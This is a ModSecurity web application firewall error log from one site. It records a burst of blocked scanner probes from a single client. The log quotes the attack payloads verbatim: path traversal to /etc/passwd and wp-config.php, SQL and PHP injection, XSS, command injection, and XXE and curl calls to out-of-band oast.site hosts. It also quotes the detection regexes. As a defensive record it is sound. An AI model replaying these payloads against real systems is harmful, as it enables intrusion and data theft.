[Tue Aug 29 11:41:10.483531 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAcoNSkAAAAF"]
[Tue Aug 29 11:41:13.450444 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcyp14AAAAK"]
[Tue Aug 29 11:41:15.421257 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAaZ9pcAAAAo"]
[Tue Aug 29 11:41:18.356551 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAActbK8AAAAH"]
[Tue Aug 29 11:41:18.652067 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAc0NcIAAAAM"]
[Tue Aug 29 11:41:19.350315 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAActbLUAAAAH"]
[Tue Aug 29 11:41:19.439818 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAYf-Q8AAAAD"]
[Tue Aug 29 11:41:19.942765 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcyp4AAAAAK"]
[Tue Aug 29 11:41:20.535399 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJMkAAAAG"]
[Tue Aug 29 11:41:20.535547 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAaZ9rAAAAAo"]
[Tue Aug 29 11:41:20.756261 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc4EnMAAAAP"]
[Tue Aug 29 11:41:21.419000 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAc4EngAAAAP"]
[Tue Aug 29 11:41:22.001204 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gagzb6n8hzkexo.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128sCo-f0AAAcqJNkAAAAG"]
[Tue Aug 29 11:41:22.543751 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAc2dRIAAAAN"]
[Tue Aug 29 11:41:23.453168 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAUKhFUAAABC"]
[Tue Aug 29 11:41:24.393010 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcoNVwAAAAF"]
[Tue Aug 29 11:41:24.407453 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-RkAAAAD"]
[Tue Aug 29 11:41:24.481665 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc4EoIAAAAP"]
[Tue Aug 29 11:41:25.545328 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dSsAAAAN"]
[Tue Aug 29 11:41:25.545500 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAcbSF8AAAAv"]
[Tue Aug 29 11:41:26.422612 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcoNWoAAAAF"]
[Tue Aug 29 11:41:26.422938 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAQkBdAAAAAC"]
[Tue Aug 29 11:41:26.682325 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAUKhGQAAABC"]
[Tue Aug 29 11:41:27.517719 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAYf-TIAAAAD"]
[Tue Aug 29 11:41:28.432172 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggz9eh8oqjowz3.oast.site found within TX:1: cjmnbitjmimt14dgn26ggz9eh8oqjowz3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc2dTsAAAAN"]
[Tue Aug 29 11:41:30.405413 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g5pq18b4tgq5ma.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAYf-T8AAAAD"]
[Tue Aug 29 11:41:30.676138 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAbo-ZAAAAAi"]
[Tue Aug 29 11:41:32.478076 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcoNYkAAAAF"]
[Tue Aug 29 11:41:32.519446 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAUKhIEAAABC"]
[Tue Aug 29 11:41:33.479114 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcbSJUAAAAv"]
[Tue Aug 29 11:41:35.423508 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAc8A1EAAAAK"]
[Tue Aug 29 11:41:36.592642 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAXHqDgAAAAT"]
[Tue Aug 29 11:41:36.648124 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAcbSKgAAAAv"]
[Tue Aug 29 11:41:38.368330 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc0NkEAAAAM"]
